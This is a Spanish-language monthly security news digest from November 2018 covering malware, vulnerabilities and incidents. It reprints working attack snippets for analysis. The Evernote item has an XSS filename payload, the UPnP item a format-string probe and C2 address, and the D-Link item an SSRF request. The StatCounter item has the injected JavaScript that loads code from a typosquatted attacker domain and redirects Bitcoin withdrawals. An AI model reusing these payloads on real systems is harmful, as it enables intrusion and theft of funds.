Noticias de Seguridad Noviembre 2018
Nuevo minador en Linux capaz de cambiar la contraseña del administrador
A pesar de la continua caída del valor de las criptomonedas, siguen siendo un objetivo prioritario para los desarrolladores de malware. La empresa rusa de antivirus Dr.Web ha descubierto recientemente un sofisticado minador para la criptomoneda Monero (XMR) que afecta a los sistemas Linux.
Pese a que el malware diseñado para sistemas Linux aún no está muy extendido, cada vez se está volviendo más complejo y multifuncional. El malware Linux.BtcMine.174, comentado en este artículo, es una prueba de ello.
El fabricante ruso de antivirus Dr.Web ha identificado a este malware con un nombre genérico de Linux.BtcMine.174. No obstante, este troyano no tiene nada de genérico. Está diseñado para realizar una serie de acciones bien planificadas para garantizar al atacante que cumple con su fin último: minar la criptomoneda Monero.
Se trata de un script de shell de más de mil líneas de código, que en primer lugar, trata de ser el primer archivo en ejecutarse al arrancar el sistemaLinux. A continuación, busca una carpeta en la que pueda copiarse para trabajar desde ella autorreplicándose y descargándose otros módulos adicionales que amplíen sus funcionalidades.
El siguiente paso que realiza este troyano es la explotación de las vulnerabilidades CVE-2016-5195 y CVE-2013-2094, para lograr una elevación de privilegios y conseguir los permisos de root con los que hacerse con el control del sistema operativo. De este modo logra configurarse como un demon local, llegando a descargarse la utilidad nohup en caso de necesitarla.
Llegados a este punto, el Linux.BtcMine.174 ya ha logrado hacerse con el control del equipo infectado. A continuación, procede con la ejecución de su función principal: la minería de criptomonedas. Para optimizar la explotación del huésped comienza escaneando el sistema para eliminar todo malware rival que pudiera estar ya operando, y luego descarga e inicia su propia infraestructura de minería de Monero.
Al mismo tiempo descarga y ejecuta en paralelo otro malware, llamado Trojan.Linux.BillGates, un troyano capaz de realizar ataques DDoS entre otras funciones típicas de la familia Backdoor. Y para evitar su detección por parte del usuario, también busca procesos asociados con soluciones antivirus basadas en Linux, deteniéndolos al igual que hiciera previamente con el malware rival. Hasta ahora, los investigadores de Dr.Web han identificado como procesos antivirus susceptibles de ser interrumpidos por este malware: safedog, aegis, yunsuo, clamd, avast, avgd, cmdmgd, drweb-configd, drweb-spider-kmod, esets y xmirrord.
La siguiente fase del ataque consiste en descargarse y ejecutar un rootkit, y agregarse como una entrada de ejecución automática a archivos como /etc/cron.hourly, /etc/rc.local, /etc/rc.d/,… Todo ello para robar las contraseñas ingresadas por el usuario con el comando su y ocultar sus archivos dentro del sistema de archivos, conexiones de red y procesos en ejecución. Además, el malware recopilará información sobre los servidores remotos a los que el huésped se haya conectado a través de SSH con el objeto de intentar acceder a los mismos para continuar con su propagación.
Gracias a esta estrategia de robo de credenciales SSH válidas, el Linux.BtcMine.174 es capaz de autopropagarse por esta vía a la vez que dificulta la tarea de los administradores de sistema Linux para proteger adecuadamente las conexiones SSH, puesto que basta con que el malwareinfecte un host autorizado para saltarse dicha protección.
Más información:
El servicio postal de Estados Unidos expone datos de 60 millones de usuarios
El servicio postal de Estados Unidos ha corregido recientemente una vulnerabilidad crítica que exponía datos de los usuarios.
La oficina de servicio postal de Estados Unidos se encarga de gestionar el servicio de correos en todo el país. Uno de sus servicios consiste en ofrece una API con la que se puede acceder a información sobre el estado de los envíos. Según especialistas en forense digital y ciberseguridad del Instituto Internacional de Seguridad Cibernética ha sido corregida, y se trataba de una vulnerabilidad en la autenticación de la API.
El fallo en la API ocurría debido a que esta permitía a cualquier usuario registrado en USPS realizar consultas al sistema utilizando “comodines” como parámetros de búsqueda. Como resultado, los usuarios podían utilizar este fallo para realizar consultas sobre cualquier envío y obtener datos de otros usuarios como: direcciones de email, números de cuenta, números de teléfono o direcciones.
Además de poder acceder a datos de otros usuarios, un fallo de autenticación en la API, permitía a cualquier usuario realizar peticiones para modificar datos de otros usuarios.
Según el Servicio Postal, por el momento no hay indicios de que esta vulnerabilidad haya sido explotada de forma maliciosa por ningún usuario. Pero continua estudiando el incidente para determinar si en algún momento la vulnerabilidad ha sido explotada.
https://www.cnet.com/es/noticias/usps-corrige-bug-expuso-datos-60-millones-usuarios/
Ejecución de código remoto en Mac OS a través de Safari
Se han encontrado 3 vulnerabilidades Zero-Day que permitían la ejecución de código en el sistema a través del navegador Safari.
El equipo de seguridad ofensiva de Dropbox realizó una práctica de Red Team en la que se encontraron 3 vulnerabilidades diferentes, que juntas permitieron abrir en el sistema a través de Safari una aplicación firmada para que ejecutase otra no firmada con código malicioso.
El primero de los fallos, identificado con el CVE-2017-13890, se encontraría en la asignación de los “Core-Type” para la extensión “.smi” y sus aplicaciones autorizadas. Dicha extensión es utilizada al mismo tiempo para el Core-Type com.real.smil, empleado por Real Player y que no supondría ningún riesgo, como por el Core-Type com.apple.disk-image-smi, que corresponde a Disk Image Mounter. Al ser la extensión “.smi”utilizada por Real Player, ésta se marca como segura, a pesar de que Disk Image Mounter sí puede suponer un riesgo.
Aunque la vulnerabilidad anterior permite abrir una imagen, con el inconveniente que ello supone, es la vulnerabilidad CVE-2018-4176 en la utilidad bless la que supone un auténtico problema, al permitir ejecutar una aplicación. El fallo se encuentra en el parámetro “–openfolder” de bless, que al contrario de lo que dice su descripción, en vez de abrir el directorio contenedor con el explorador de archivos (Find), ejecuta la aplicación de la ruta si ésta fuese un bundle con extensión “.bundle”.
A pesar de todo, y aunque con la anterior vulnerabilidad ya es posible ejecutar una aplicación, Mac OS incluye una medida de seguridad adicional que impide la ejecución de aplicaciones no firmadas que se hayan descargado desde Safari. En caso de abrir una aplicación no firmada, Gatekeeper, el encargado de esta medida de seguridad, muestra una advertencia e impide la ejecución. No obstante, Gatekeeper sí permite la ejecución si es una aplicación firmada, y se ha descubierto que modificando el fichero Info.plist del bundle (lo cual no invalida la firma) es posible asociar una nueva extensión para permitir la ejecución de un programa, y que Gatekeeper no controla si dicho programa está firmado o no. Se ha asignado el identificador CVE-2018-4175 a dicha vulnerabilidad, y ha podido comprobarse su funcionamiento ejecutando un script no firmado a través de un bundle modificado que ejecuta la aplicación Terminal del sistema.
Los fallos fueros corregidos en la actualización de marzo de este año. Las versiones actualizadas son MacOS High Sierra 10.13.4, Security Update 2018-002 Sierra, y Security Update 2018-002 El Capitan. En caso de no haber recibido alguna de estas actualizaciones en su momento, se urge actualizar lo antes posible.
Más información:
Offensive testing to make Dropbox (and the world) a safer place:
https://blogs.dropbox.com/tech/2018/11/offensive-testing-to-make-dropbox-and-the-world-a-safer-place/
About the security content of macOS High Sierra 10.13.4, Security Update 2018-002 Sierra, and Security Update 2018-002 El Capitan:
https://support.apple.com/en-us/HT208692
Ejecución de código en Atlantis Word Processor
Los investigadores de seguridad de Cisco Talos han descubierto múltiples vulnerabilidades en el procesador de textos Atlantis que permiten a los atacantes ejecutar código arbitrario en los sistemas remotamente.
Atlantis es una alternativa a Microsoft Word que permite alos usuarios crear, leer y editar documentos de Word. También se usa para la conversión a distintos formatos como por ejemplo: TXT, RTF, ODT, DOC, WRI, DOCX o ePub.
El equipo de Talos ha liberado tres pruebas de concepto para la corroboración de la vulnerabilidad.
- CVE-2018-4038: cálculo incorrecto del tamaño del buffer, vulnerabilidad que reside en el analizador del formato del documento.
- CVE-2018-4039: validación incorrecta, vulnerabilidad que permite un bufferoverflow en la implementación de los PNG por parte de la aplicación.
- CVE-2018-4040: variable no inicializada, vulnerabilidad que reside en el analizador del formato de texto enriquecido.
Todas estas vulnerabilidades están presentes para las versiones 3.2.7.1 y 3.2.7.2; y pueden ser explotadas a través de correos con ficheros adjuntos que al ser ejecutados por esta aplicación desencadenan la ejecución de código remoto.
Estas vulnerabilidades se corrigen con la actualización a la versión 3.2.10.1; por lo tanto, se recomienda actualizar a la versión indicada para corregir estos fallos de seguridad, así como no abrir ficheros adjuntos de remitentes desconocido y disponer de las medidas básicas de seguridad en nuestros sistemas.
Mas información:
Detalles técnicos
https://blog.talosintelligence.com/2018/11/Atlantis-Word-Processor-RCE-vulns.html
Fuente
https://thehackernews.com/2018/11/word-processor-vulnerability.html
Fuga accidental de contraseñas en Instagram
La red social Instagram revela por error las contraseñas de parte de sus usuarios.
El problema reside en la nueva opción para descargar el histórico de la actividad de los usuarios, que almacenaba la contraseña en texto plano en los servidores de Facebook. Este histórico contiene (entre otra información) fotografías, comentarios, posts y en definitiva toda la actividad que el usuario genera dentro de la red social.
Recordemos que esta nueva funcionalidad es obligatoria para cumplir con la normativa Europea que regula la privacidad de los usuarios; la GDPR (General Data Protection Regulation), que fue implantada tras el escándalo de Cambridge Analytica.
Para prevenir accesos no autorizados a la descarga de dicho histórico, Instagram pide antes confirmación de la credencial de acceso del usuario. Sin embargo, las contraseñas en texto plano quedaban incluidas en la URL y posteriormente se almacenaban en los servidores de Facebook debido a un fallo de seguridad. Este problema fue descubierto por el propio equipo de Instagram.
La compañía ha solucionado el problema con rapidez y a través de un comunicado esclarecen que las contraseñas ya se han borrado de los servidores de Facebook. Posteriormente se comenzó a notificar a los usuarios afectados para que cambien sus contraseñas a la mayor brevedad posible, borren la caché del navegador y habiliten la verificación en dos pasos. Este incidente, según el equipo de Instagram ha afectado a un número muy pequeño de usuarios.
Esta falla se suma a la ya ocurrida a finales de agosto, donde se corrigieron fallos importantes en la API de la red social que permitió a atacantes (aun desconocidos) conocer los correos electrónicos y números de teléfono de usuarios famosos de alto perfil.
Botnet IoT infecta 100.000 routers para enviar spam
Una nueva botnet IoT, bautizada como ‘BCMUPnP_Hunter‘, ha sido descubierta infectando routers para enviar correos electrónicos de spam.
Los investigadores de seguridad Hui Wang y RootKiter han descubierto recientemente una botnet IoT que infecta routers de diferentes marcas con el objetivo de enviar correos eléctronicos de spam a diferentes servicios de correo electrónico, como Hotmail, Outlook o Yahoo.
Esta botnet se ha bautizado con el nombre de ‘BCMUPnP_Hunter‘ debido al modo con el que infecta los routers. Para infectar a los routers, este malware hace uso de una vulnerabilidad de seguridad en la implementación del protocolo UPnP en los chips BroadCom encontrada en octubre de 2013. Esta vulnerabilidad de seguridad es del tipo ‘format string‘, por lo que permite al atacante explotar dicha vulnerabilidad para obtener y modificar información contenida en la memoria del proceso. Concretamente, esta vulnerabilidad se encuentra en la función SetConnectionType, que es accesible a través de una petición SOAP.
Si en el parámetro NewConnectionType se incluye una cadena de texto que incluya un especificador de formato (para las funciones de formato en C suelen venir precedidos por ‘%’, como por ejemplo: ‘%s’, ‘%d’, etc.), entonces ese especificador de formato será interpretado y utilizado por el programa. Esto permite a un atacante obtener información contenida en la memoria o modificarla (usando el especificador de formato ‘%n’). Por ejemplo, si enviamos ‘%x,%x’ como valor para el parámetro NewConnectionType, recibiremos como respuesta los dos primeros elementos en la pila de memoria del proceso en formato hexadecimal.
Después de realizar un escaneo, los investigadores han detectado 116 tipos diferentes de dispositivos infectados por este malware. Puede consultarse la lista completa de dispositivos detectados en la publicación de su blog.
IoCs:
C2
109.248.9.17 “Bulgaria/BG” “AS58222 Solar Invest UK LTD” #C2&&Loader
MD5 de la muestra
9036120904827550bf4436a919d3e503
Post de análisis de la muestra:
http://blog.netlab.360.com/bcmpupnp_hunter-a-100k-botnet-turns-home-routers-to-email-spammers-en/
Post sobre la vulnerabilidad protocolo UPnP:
http://defensecode.com/whitepapers/From_Zero_To_ZeroDay_Network_Devices_Exploitation.txt
Descubiertas vulnerabilidades de día-0 en iPhone X, Samsung Galaxy S9 y Xiaomi Mi6
Hackers consiguen comprometer la seguridad de dispositivos móviles durante la prestigiosa competición Pwn2Own, celebrada en Tokio.
Pwn2Own es uno de los concursos de hacking ético más populares, se lleva celebrando desde el año 2007 durante la conferencia de seguridad PacSec; está organizada por Trend Micro’s Zero Day Initiative (ZDI) y se reparten cuantiosos premios en metálico a los concursantes que consigan explotar nuevas vulnerabilidades en dispositivos y software (actualizado) de uso general.
La competición se divide en cinco categorías: Navegadores, Distancia corta, Mensajería, Baseband e IoT:
Equipos de hackers de diversas las nacionalidades o representando a compañías de ciberseguridad fueron capaces de encontrar hasta 18 vulnerabilidades de día cero (0-days) en dispositivos móviles de Apple, Samsung y Xiaomi. Junto con los correspondientes exploits que permitían tomar el control total del dispositivo.
Apple iPhone X con iOS 12.1
El equipo compuesto por los investigadores Richard Zhu y Amat Cama (Fluoroacetate Team) descubrieron y explotaron una combinación de dos vulnerabilidades en iOS; La primera de ellas es un fallo just-in-time (JIT) en el navegador iOS de Safari junto con una escritura “out-of-bounds” (escritura fuera de un cierto límite) en el sandbox de Safari que les permitió descargar una imagen del dispositivo. Con este trabajo, Fluoroacetate ganó 50.000$.
Samsung Galaxy S9
De nuevo, el equipo Fluoroacetate consiguió explotar un heap overflow en el baseband del terminal que permitía la ejecución de código arbitrario en el terminal. Con este bug, el Team Fluoroacetate logró embolsarse otros 50.000$
El Team MWR descubrió también otras tres vulnerabilidades diferentes para este mismo dispositivo, que forzaban al terminal a visitar un portal captativo sin interacción del usuario. Después, usaron una redirección insegura junto con un fallo en la carga de aplicaciones para instalar una app maliciosa. Esta hazaña les supuso una recompensa de 30.000$.
Xiaomi Mi6
Fluorocetate continuó al día siguiente con este terminal y encontraron un integer overflow en el motor javascript del navegador web de Xiaomi Mi6 que les permitió copiar una imagen de prueba del dispositivo y con ello volver a ganar otros 25.000$. Este equipo logró encontrar otra vulnerabilidad más a través de NFC usando la capacidad touch-to-connect (tocar para conectar) del dispositivo, forzando al terminal a que abra el navegador web y visite un sitio web especialmente preparado para comprometer completamente el terminal móvil, con esta última vulnerabilidad ganaron 30.000$.
El Team MWR Labs logró combinar cinco bugs diferentes para instalar silenciosamente una app vía JavaScript y bypaseando la lista blanca de aplicaciones para lanzar automáticamente una aplicación maliciosa. Para lograrlo, MWR forzó al navegador por defecto del dispositivo a que visite un sitio web malicioso una vez que el terminal se conecta a un punto de acceso wireless malicioso. Con esta vulnerabilidad, el Team MWR consiguió 30.000$.
En el segundo día, el Team MWR combinó un fallo en las descargas del dispositivo junto con un bug que permitía la instalación silenciosa de cualquier app, para exfiltrar una fotografía de prueba en este dispositivo.
Laboratorio Hispasec.
Más información:
PWN2OWN TOKYO 2018
https://www.zerodayinitiative.com/blog/2018/11/13/pwn2own-tokyo-2018-day-one-results
Múltiples vulnerabilidades en D-LINK Central WifiManager
Se han hecho públicas 3 vulnerabilidades que afectan a D-LINK Central WifiManager CWM-100 y que podrían permitir ejecutar código arbitrario con altos privilegios, realizar ataques de rebote FTP y ataques Server Side Request Forgery.
Central WiFiManager es una herramienta de D-Link que permite a los administradores gestionar y supervisar de forma remota múltiples puntos de acceso inalámbricos. Central WiFiManager es una herramienta basada en la web, por lo que se puede utilizar tanto instalada en un ordenador local como alojada en la nube.
La primera vulnerabilidad, identificada como CVE-2018-15515, permitiría ejecutar código arbitrario con permisos de ‘SYSTEM’ a través de una librería DLL creada a tal efecto. Dicha librería de 32 bits debe ser renombrada como ‘quserex.dll’ y copiada al directorio ‘CaptivelPortal’, y por último reiniciar el servicio ‘CaptivelPortal’ para que ejecute el código contenido en la DLL. Esta vulnerabilidad podría ser aprovechada por troyanos y otros tipos de malware.
Como prueba de concepto se propone ejecutar el siguiente programa (que simplemente muestra un mensaje) y observarlo con un monitor de procesos para verificar el usuario y los permisos con que se ejecuta.
La segunda vulnerabilidad permitiría realizar ataques de rebote FTP que consisten en aprovechar un fallo en el protocolo FTP mediante el cual se podría utilizar el comando PORT para escanear puertos utilizando el servidor FTP vulnerable como intermediario. De tal manera, de cara a las víctimas, los escaneos se originarían en la red en la que se encuentra el servidor FTP vulnerable. A esta vulnerabilidad se le ha asignado el identificador CVE-2018-15516.
Como prueba de concepto se propone el siguiente vídeo: https://vimeo.com/299797225.
Por último, el identificador CVE-2018-15517 se ha asignado a una vulnerabilidad que afecta a la función ‘MailConnect’ que, aunque está diseñada para verificar la conexión a un servidor SMTP, permite conexiones TCP salientes a cualquier puerto en cualquier dirección IP. Esto permitiría realizar ataques Server Side Request Forgery (SSRF) a través de peticiones del tipo:
https://DIRECCION-IP/index.php/System/MailConnect/host/DIRECCION-IP-VICTIMA/port/secure/
Estas vulnerabilidades, descubiertas por John Page (aka hyp3rlinx), afectan a la versión 1.03 r0098 de D-LINK Central WifiManager (CWM 100).
Más información:
CVE-2018-15515 / D-LINK Central WifiManager CWM-100 / Trojan File SYSTEM Privilege Escalation:
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SYSTEM-PRIVILEGE-ESCALATION.txt
CVE-2018-15517 / D-LINK Central WifiManager CWM-100 / Server Side Request Forgery:
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
CVE-2018-15516 / D- LINK Central WifiManager CWM-100 / FTP Server PORT Bounce Scan:
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-FTP-SERVER-PORT-BOUNCE-SCAN.txt
Reveladas siete nuevas variantes de los ataques Meltdown y Spectre
El trabajo de investigación conjunto entre la Universidad pública de Williamsburg, la Universidad tecnológica de Graz, el grupo de investigación DistriNet y la KU de Lovaina junto con algunos de los expertos que idearon los ataques de Meltdown y Spectre dio lugar al descubrimiento de siete nuevos ataques, variantes de Meltdown y Spectre.
Estos nuevos ataques se basan en una técnica conocida como “transient execution” o “ejecución transitoria”, utilizada en procesadores modernos para aumentar la concurrencia y con ella la velocidad de procesado. El ataque, permite revelar información de la memoria física inaccesible por el usuario, mediante la observación del estado de la microarquitectura y su posterior transferencia a un estado arquitectónico.
Los nuevos ataques son dos son variantes de Meltdown y cinco de Spectre.
Meltdown-PK (Protection Key Bypass)
Permitiría romper el aislamiento PKU (Clave de protección de la memoria de usuario) para leer y escribir en un espacio protegido. Este mecanismo de protección está presente en chips Intel Skylake-SP y requeriría una actualización del hardware para solventar el fallo.
Meltdown-BR (Bounds Check Bypass)
Permitiría revelar información a través de las excepciones producidas por el módulo de verificación de límites (Bound Range Exceptions) en chips de Intel y AMD.
Spectre-PHT (Pattern History Table)
Estos ataques explotan la tabla de historial de patrones para revelar información oculta. Se distinguen tres variantes, dependiendo de la rama que se esté explotando y la localización de la información revelada.
- Spectre-PHT-CA-OP (Cross-Address-space Out of Place): dentro de un espacio de direcciones controlado por el atacante.
- Spectre-PHT-SA-IP (Same Address-space In Place): dentro del mismo espacio de direcciones y la misma rama que se está explotando.
- Spectre-PHT-SA-OP (Same Address-space Out of Place): en el mismo espacio de direcciones pero en distinta rama.
Por último, otras dos variantes basadas en la explotación del búfer de la rama de destino (BTB).
Specter-BTB (Branch Target Buffer)
- Specter-BTB-SA-IP (Same Address-space In Place): en mismo espacio de direcciones y la misma rama que se está explotando.
- Specter-BTB-SA-OP (Same Address-space Out of Place): en mismo espacio de direcciones con una rama diferente.
Chips de AMD, ARM e Intel son vulnerables a estas cinco variantes de Spectre.
Los fabricantes fueron notificados de manera responsable por los investigadores y están trabajando en una solución para mitigar estos ataques.
Más información:
A Systematic Evaluation of Transient Execution Attacks and Defenses
https://arxiv.org/abs/1811.05441
Transient Execution Attacks
https://gruss.cc/files/vusec18.pdf
Usas un dron DJI? Es posible que tu información sensible esté en peligro
Investigadores de CheckPoint han revelado detalles de una vulnerabilidad en la aplicación web de DJIque podría haber permitido a un atacante acceder a cuentas de usuario y sincronizar información sensible como: registros de vuelo, ubicación, vídeo de cámara en vivo y fotos tomadas.
El equipo de DJI a pesar de estar informado de esta vulnerabilidad desde marzo, no ha puesto solución a la misma hasta hace menos de dos meses.
Introducción:
La vulnerabilidad en cuestión se valía de tres ataques diferentes para conseguir acceder a las cuentas de las victimas. Vamos a explicar algunos conceptos usados durante el análisis del fallo para que se comprenda mejor:
- Atributos de las cookies: Las cookies de sesión tienen una serie de indicadores que mejoran la seguridad de las mismas. Principalmente son tres:
- Secure: Obliga a que la cookie se envíe solo mediante comunicaciones seguras y encriptadas.
- HTTPOnly: Especifica que la cookie solo es accesible mediante el protocolo HTTP.
- Same-site: Impide que el navegador envíe la cookie cuando la petición es originada desde un dominio externo. (No está relacionada con la vulnerabilidad que vamos a comentar).
- XSS (Cross-site Scripting): Vulnerabilidad web que consiste en inyectar código JavaScript. Hay dos tipos:
- Reflejado: Consiste en editar los valores que se pasan mediante URL.
- Persistente: Consiste en insertar código HTML en sitios que lo permitan, de manera que este queda visible antes cualquier usuario que lo visite.
Explicación de la vulnerabilidad:
Debido a una vulnerabilidad XSS persistente en el foro de DJI, un atacante podía inyectar un enlace con código malicioso que robara las cookies de sesión de la víctima que accediera. Estas al no tener correctamente configurados los atributos Secure y HTTPOnly, permitían al atacante reutilizarlas para tomar el control de la cuenta web DJI del usuario, de las aplicaciones móviles y de la plataforma centralizada de gestión de operaciones con drones llamada DJI Flighthub.
Sin embargo, para acceder a la cuenta comprometida en las aplicaciones móviles no valía solo con los hechos mencionados. Los atacantes además debían interceptar el tráfico de la aplicación móvil, y gracias a un fallo en la configuración de la implementación SSL, y mediante un ataque de hombre en el medio (MitM) conseguían el acceso.
Recomendaciones:
A pesar de que DJI ha asegurado que no ha encontrado evidencias de que el fallo se haya estado explotando más allá de los laboratorios de CheckPoint, si eres usuario de la empresa y has dado clic en algún enlace sospechoso del foro, se lo hagas saber de inmediato al soporte técnico.
Más información:
Report realizado por CheckPoint:
https://research.checkpoint.com/dji-drone-vulnerability/
XSS persistente en Evernote te abre paso a ejecutar programas en Windows
Una nueva vulnerabilidad XSS persistente en la versión de escritorio de Windows permite ejecutar programas en la máquina de la víctima de forma remota si lo combinas con otros ataques, en este caso Read Local File y Remote Command Execute.
El fallo se produce cuando un usuario añade una imagen a alguna nota. Si cambia el nombre de la imagen por código JavaScript, se ejecuta. Teniendo en cuenta que al guardar la nota queda almacenado el código JavaScript inyectado, nos encontramos con un XSS persistente.
A partir de esta vulnerabilidad es posible realizar otros ataques. Puesto que Evernote utiliza NodeWebKit para sus presentaciones de notas, es posible ejecutar un script desde un servidor remoto escrito en Node.js que lea ficheros en la máquina Windows del usuario que abra la nota en modo presentación.
><script src="http://example.org/bad-javascript.js">.jpg
Un usuario malicioso puede utilizar la opción Work Chat de Evernote para enviar la nota a la víctima y persuadirla para que la abra en modo presentación.
En una POC realizada por TonQing Zhu se muestra cómo explotando esta vulnerabilidad se pueden leer ficheros de la máquina de la víctima, en este caso el fichero ‘win.ini’ y ejecutar programas, como por ejemplo, la calculadora.
Envío de nota por Work Chat de Evernote:
El fallo ha sido clasificado como CVE-2018-18524, y fue parcheado inicialmente en Evernote para Windows 6.16.1 beta en octubre. Y la actualización con el último parche se lanzó a principios de este mes con versión 6.16.4.
Más información:
prodefence.org:
http://www.prodefence.org/xss-flaw-in-evernote-allows-attackers-to-execute-commands-and-steal-files/
movaxbx.ru:
https://movaxbx.ru/2018/11/05/evernote-for-windows-read-local-file-and-command-execute-vulnerabilities/
Los secuestros BGP del gobierno de China
El gobierno Chino secuestró tráfico de red de usuarios de EEUU para ser redirigido hacía el país Chino.
La Naval War College de los Estados Unidos ha publicado un artículo en el que se evidencia como el gobierno de China (a través del proveedor de servicios China Telecom) redirigió en múltiples ocasiones el tráfico de internet de parte de los usuarios de Estados Unidos hacia China, mediante la técnica de secuestro BGP.
BGP (Border Gateway Protocol) es un protocolo clave en las comunicaciones de internet. Este protocolo es utilizado para intercambiar información de enrutamiento entre los distintos proveedores de servicios registrados en internet. Garantizando que dichas rutas estén libres de bucles y representan el camino más corto entre dos extremos de una comunicación.
En el artículo, se resalta como en 2015 Estados Unidos y China alcanzaron un acuerdo por el cual se pretendían reducir los ciberataques directos entre ambas potencias. Dicho acuerdo pareció tener impacto en el número de ataques que ambos países recibían.
Sin embargo, este acuerdo no contempla los cada vez más frecuentes ataques de secuestro BGP que suelen sufrir en general los países del oeste.
¿ Cómo funciona un ataque de secuestro de rutas BGP ?
Internet se basa en la interconexión de otras muchas redes de forma más o menos jerárquica. En los routers frontera de cada una de esas redes, funciona el protocolo BGP, encargado como ya hemos comentado de encaminar el tráfico por una u otra red, dependiendo de cual sea el camino más corto hasta llegar a un determinado destino.
Un ataque de secuestro BGP ocurre cuando un router frontera de una de estas redes anuncia de forma intencionada (o por un fallo de configuración) rutas pertenecientes a otra red distinta como si fuese una ruta propia.
Si esta falsa afirmación es aceptada por el resto de redes vecinas, entonces el tráfico se encaminará al atacante en lugar de su destino legítimo.
Laboratorio Hispasec.
Más información:
“https://scholarcommons.usf.edu/cgi/viewcontent.cgi?article=1050&context=mca”
“http://redestelematicas.com/arquitectura-de-internet”
“https://es.wikipedia.org/wiki/Border_Gateway_Protocol”
Explicando el 0-day de VirtualBox
La vulnerabilidad permite al malware escapar de la máquina virtual al equipo anfitrión.
El descubridor del fallo es el investigador de seguridad Sergey Zelenyuk, el cual, al estar en desacuerdo con la situación actual del mercado de Bug Bounty, decidió publicar el fallo.
Información referente al 0-day:
- Software vulnerable: Todas las versiones de VirtualBox hasta la actualidad (5.2.20)
- Sistema operativo anfitrión: Cualquiera.
- Sistema operativo invitado: Cualquiera.
- Configuración de red: Intel PRO / 1000 MT Desktop (82540EM) en modo NAT. Destacar que esta es la configuración que trae por defecto VirtualBox.
Introducción:
Antes de comenzar con la explicación de la vulnerabilidad, creo que hay que aclarar varios conceptos relacionados con el software vulnerado necesarios para el entendimiento total del fallo.
- E1000: Hace referencia al dispositivo de red virtual Intel PRO / MT Desktop (82540EM).
- LKM: Módulo del kernel de Linux.
- Descriptores Tx: Los descriptores Tx o de transmisión se encargan de almacenar metainformación de los paquetes enviados a través del adaptador. Esta metainformación puede ser: el tamaño del paquete, la etiqueta VLAN, los indicadores habilitados para la segmentación TCP/IP, etc.La configuración de red utilizada en la vulnerabilidad proporciona tres tipos de descriptores Tx:
- Legacy: Ya no se utiliza.
- Contexto: Se encargan de establecer el tamaño máximo de paquete y la segmentación TCP/IP.
- Datos: Contienen direcciones físicas de paquetes de red y sus tamaños.
Un punto a destacar es que normalmente, los descriptores de contexto se suministran a la tarjeta de red antes que los descriptores de datos, y en estos se debe especificar un tamaño máximo de paquete mayor que el tamaño del descriptor de datos.
Resumen de la vulnerabilidad:
Debido a la configuración de E1000 es posible, mediante el envío de una cadena de descriptores Tx específicos, conseguir un desbordamiento de búfer (comúnmente conocido como buffer overflow), el cual concluye en dos posibilidades (ambas usadas en la explotación):
- Los datos se leerán desde el invitado en un búfer de almacenamiento dinámico.
- Copia de datos de una longitud específica al búfer sin ninguna verificación.
Además, el exploit utilizado por Zelenyuk hace uso del LKM para cargar un sistema operativo invitado. Como se requiere escalada de privilegios para conseguir cargar el controlador en ambos sistemas, hace uso de cadenas de explotaciones publicadas en el concurso Pwn2Own.
Estas cadenas explotan un navegador que abre un sitio web malicioso en el sistema operativo invitado, el cual consigue escapar de la sandbox para obtener acceso total al anillo 3 (nivel de aplicación).
Finalmente, y gracias a vulnerabilidades conocidas, consigue escalada de privilegios para acceder al anillo 0 (nivel de kernel) donde está todo lo necesario para atacar a un hipervisor desde el sistema operativo invitado.
Recomendaciones:
En primer lugar, estar muy atentos a la espera de una nueva actualización por parte del equipo de VirtualBox que arregle este fallo.
En segundo lugar, se recomienda no utilizar la configuración de red especificada al comienzo del artículo para asegurar la seguridad del equipo anfitrión.
Más información:
Explicación del 0-day por parte de Sergey Zelenyuk:
https://github.com/MorteNoir1/virtualbox_e1000_0day/blob/master/README.md
Secuestran el JavaScript de StatCounter para el robo de criptomonedas
Mediante un ataque de envenenamiento de caché el grupo de ciber-delincuentes han conseguido modificar el código JavaScript de StatCounter para traspasar Bitcoins desde una cartera a otra. El ataque parece estar dirigido hacia el conocido exchange ‘Gate.io’, quien afirma que ninguno de sus usuarios parece haber sido afectado.
StatCounter es una conocida herramienta para el análisis del tráfico web. Al rededor de 3 millones de páginas web en todo el mundo utilizan esta herramienta para obtener estadísticas sobre sus visitantes.
Investigadores de ESET descubrieron que el código JavaScript que se insertaba en las páginas de Gate.io había sido modificado. El código malicioso se encontraba en el componente ‘statcounter.com/counter/counter.js’ y trataba de interceptar y redirigir las transacciones de Bitcoin que tenían lugar en la popular plataforma de trading.
El fragmento de código introducido por los atacantes, comprueba si la URL que visita la víctima coincide con la cadena ‘myaccount/withdraw/BTC’ (correspondiente a una operación de retirada de Bitcoins). En caso afirmativo, se carga otro fragmento de código incluido en ‘https://www.statconuter[.]com/c.php’. Notar que el dominio puede parecer legítimo a simple vista, pero en realidad se intercambian las letras ‘n’ y ‘u’.
myselfloc = '' + document.location; if (myselfloc.indexOf('myaccount/withdraw/BTC') > -1) { var ga = document.createElement('script'); ga.src = 'https://www.statconuter.com/c.php'; ga.setAttribute('async', 'true'); document.documentElement.firstChild.appendChild(ga); }
Entre las diferentes plataformas de trading existentes, la URI ‘myaccount/withdraw/BTC’ sólo coincide con Gate.io, por lo que parece ser el principal objetivo de este ataque.
El payload introducido por el segundo componente ‘https://www.statconuter.com/c.php’ sustituye la dirección de Bitcoin de destino por la del atacante(1JrFLmGVk1ho1UcMPq1WYirHptcCYr2jad).
document.forms[0]['addr'].value = ''; document.forms[0]['amount'].value = ''; doSubmit1 = doSubmit; doSubmit = function () { var a = document.getElementById('withdraw_form'); if ($('#amount').val() > 10) { document.forms[0]['addr']['name'] = ''; var s = $(""); s.attr('value', '1JrFLmGVk1ho1UcMPq1WYirHptcCYr2jad'); var b = $('#withdraw_form'); b.append(s); a.submit(); } else if (document.getElementById('canUse').innerText > 10) { document.forms[0]['addr']['name'] = ''; var s = $(""); s.attr('value', '1JrFLmGVk1ho1UcMPq1WYirHptcCYr2jad'); var b = $('#withdraw_form'); b.append(s); document.forms[0]['amount']['name'] = ''; var t = $(""); t.attr('value', Math.min(document.getElementById('canUse').innerText, document.getElementById('dayLimit').innerText)); b.append(t); a.submit(); } else { doSubmit1(); } };
